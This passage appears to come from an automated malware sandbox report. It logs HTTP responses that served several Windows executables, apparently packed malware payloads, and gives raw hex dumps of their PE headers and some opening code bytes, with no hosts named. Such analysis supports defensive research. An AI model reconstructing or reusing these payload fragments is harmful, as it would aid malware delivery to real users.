00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 72 27 5c 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 08 05 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 10 0f 00 00 04 00 00 ed 9b 0f 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 ec 4c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 0e 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 ec 4c 01 00 00 40 0d 00 00 4e 01 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 90 0e 00 00 76 00 00 00 42 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 13 Dec 2024 12:52:33 GMTContent-Type: application/octet-streamContent-Length: 1794560Last-Modified: Fri, 13 Dec 2024 12:25:46 GMTConnection: keep-aliveETag: "675c27ca-1b6200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 20 8b b6 d4 64 ea d8 87 64 ea d8 87 64 ea d8 87 0b 9c 73 87 7c ea d8 87 0b 9c 46 87 69 ea d8 87 0b 9c 72 87 5e ea d8 87 6d 92 5b 87 67 ea d8 87 6d 92 4b 87 62 ea d8 87 e4 93 d9 86 67 ea d8 87 64 ea d9 87 09 ea d8 87 0b 9c 77 87 77 ea d8 87 0b 9c 45 87 65 ea d8 87 52 69 63 68 64 ea d8 87 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 19 64 54 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 2a 01 00 00 00 00 00 00 90 68 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 c0 68 00 00 04 00 00 48 fc 1b 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 a0 24 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 68 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 b0 02 00 00 00 a0 24 00 00 02 00 00 00 78 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 7a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 00 2a 00 00 c0 24 00 00 02 00 00 00 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 68 6b 7a 65 72 76 69 6b 00 c0 19 00 00 c0 4e 00 00 bc 19 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 78 76 64 7a 69 73 7a 63 00 10 00 00 00 80 68 00 00 06 00 00 00 3a 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 90 68 00 00 22 00 00 00 40 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 13 Dec 2024 12:52:42 GMTContent-Type: application/octet-streamContent-Length: 2817536Last-Modified: Fri, 13 Dec 2024 12:24:52 GMTConnection: keep-aliveETag: "675c2794-2afe00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 60 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 2b 00 00 04 00 00 03 f4 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 00 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 00 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 71 75 66 6f 70 6e 74 64 00 a0 2a 00 00 a0 00 00 00 9e 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 70 68 65 64 6d 6f 64 68 00 20 00 00 00 40 2b 00 00 04 00 00 00 d8 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 60 2b 00 00 22 00 00 00 dc 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 13 Dec 2024 12:52:48 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 13 Dec 2024 12:52:53 GMTContent-Type: application/octet-streamContent-Length: 1968640Last-Modified: Fri, 13 Dec 2024 11:52:30 GMTConnection: keep-aliveETag: "675c1ffe-1e0a00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 21 4a f8 9d 40 24 ab 9d 40 24 ab 9d 40 24 ab 83 12 a0 ab 81 40 24 ab 83 12 b1 ab 89 40 24 ab 83 12 a7 ab c5 40 24 ab ba 86 5f ab 94 40 24 ab 9d 40 25 ab f6 40 24 ab 83 12 ae ab 9c 40 24 ab 83 12 b0 ab 9c 40 24 ab 83 12 b5 ab 9c 40 24 ab 52 69 63 68 9d 40 24 ab 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 0c de dd 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 d4 02 00 00 b0 01 00 00 00 00 00 00 80 86 00 00 10 00 00 00 f0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 b0 86 00 00 04 00 00 4a 38 1e 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5a 10 42 00 6e 00 00 00 00 e0 40 00 68 21 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 b6 85 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 d0 40 00 00 10 00 00 00 54 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 68 21 01 00 00 e0 40 00 00 94 00 00 00 64 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 10 42 00 00 02 00 00 00 f8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 60 29 00 00 20 42 00 00 02 00 00 00 fa 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 61 77 7a 72 6b 69 7a 68 00 f0 1a 00 00 80 6b 00 00 e6 1a 00 00 fc 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 64 7a 69 79 6d 6a 74 62 00 10 00 00 00 70 86 00 00 06 00 00 00 e2 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 80 86 00 00 22 00 00 00 e8 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 13 Dec 2024 12:53:02 GMTContent-Type: application/octet-streamContent-Length: 4438776Last-Modified: Tue, 10 Dec 2024 00:01:52 GMTConnection: keep-aliveETag: "675784f0-43baf8"Accept-Ranges: bytesData Raw: 4d 5a 60 00 01 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 52 65 71 75 69 72 65 20 57 69 6e 64 6f 77 73 0d 0a 24 50 45 00 00 4c 01 04 00 ce 3f c3 4f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 08 00 00 90 01 00 00 96 00 00 00 00 00 00 5f 94 01 00 00 10 00 00 00 a0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 02 00 00 02 00 00 e7 a4 44 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 84 c9 01 00 c8 00 00 00 00 30 02 00 10 4f 00 00 00 00 00 00 00 00 00 00 10 7b 43 00 e8 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 01 00 6c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 0e 8e 01 00 00 10 00 00 00 90 01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 da 3b 00 00 00 a0 01 00 00 3c 00 00 00 92 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 ec 4d 00 00 00 e0 01 00 00 0a 00 00 00 ce 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 10 4f 00 00 00 30 02 00 00 50 00 00 00 d8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 55 8b ec a1 60 e9 41 00 81 ec 04 09 00 00 53 33 db 3b c3 56 57 74 1f 66 39 1d 62 e9 41 00 74 07 ff d0 a3 60 e9 41 00 50 e8 50 14 00 00 50 e8 ef 84 00 00 59 eb 6e 6a 27 e8 40 14 00 00 8b 75 08 ff 76 0c 8b 3d c0 a2 41 00 ff 36 50 8d 85 fc f6 ff ff 50 ff d7 83 c4 14 39 5e 10 89 5d fc 76 38 8d 5e 14 ff 33 8d 85 fc fe ff ff 68 90 a4 41 00 50 ff d7 83 c4 0c 8d 85 fc fe ff ff 50 8d 85 fc f6 ff ff 50 ff 15 78 a1 41 00 ff 45 fc 8b 45 fc 83 c3 04 3b 46 10 72 cb 8d 85 fc f6 ff ff 50 e8 7e 84 00 00 59 e8 d4 36 00 00 6a 0a ff 15 74 a1 41 00 cc ff 74 24 04 e8 44 ff ff ff cc 56 8b f1 e8 25 73 00 00 c7 06 a0 a4 41 00 c7 46 38 d2 07 00 00 8b c6 5e c3 6a 01 ff 71 04 ff 15 bc a2 41 00 c3 33 c0 39 05 60 ea 41 00 74 07 b8 04 40 00 80 eb 1e 39 44 24 08 74 16 ff 74 24 08 50 68 02 80 00 00 ff 35 58 ea 41 00 ff 15 b8 a2 41 00 33 c0 c2 08 00 8b 44 24 04 83 60 1c 00 83 7c 24 08 00 75 07 c7 40 1c 01 00 00 00 33 c0 c2 08 00 a0 70 e9 41 00 f6 d8 1b c0 83 e0 0b 83 c0 08 c3 ff 74 24 10 8b 44 24 08 ff 74 24 10 c7 05 60 e9 41 00 2f 11 40 00 ff 74 24 10 8b 08 50 ff 51 0c 83 25 60 e9 41 00 00 c3 33 c0 c2 0c 00 8b 54 24 08 8b 4c 24 04 0f b7 02 66 89 01 41 41 42 42 66 85 c0 75 f1 c3 8b 4c 24 04 33 c0 66 39
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 13 Dec 2024 12:53:12 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 13 Dec 2024 12:53:15 GMTContent-Type: application/octet-streamContent-Length: 727552Last-Modified: Wed, 11 Dec 2024 08:22:24 GMTConnection: keep-aliveETag: "67594bc0-b1a00"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 c0 24 58 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 4e 01 00 00 a8 00 00 00 00 00 00 2c 36 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 50 0b 00 00 08 00 00 7c 7a 0b 00 03 00 40 83 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6c ca 01 00 64 00 00 00 00 00 02 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 02 00 80 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 68 01 00 c0 00 00 00 00 00 00 00 00 00 00 00 34 cc 01 00 64 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 41 4d 01 00 00 10 00 00 00 4e 01 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 3c 7e 00 00 00 60 01 00 00 80 00 00 00 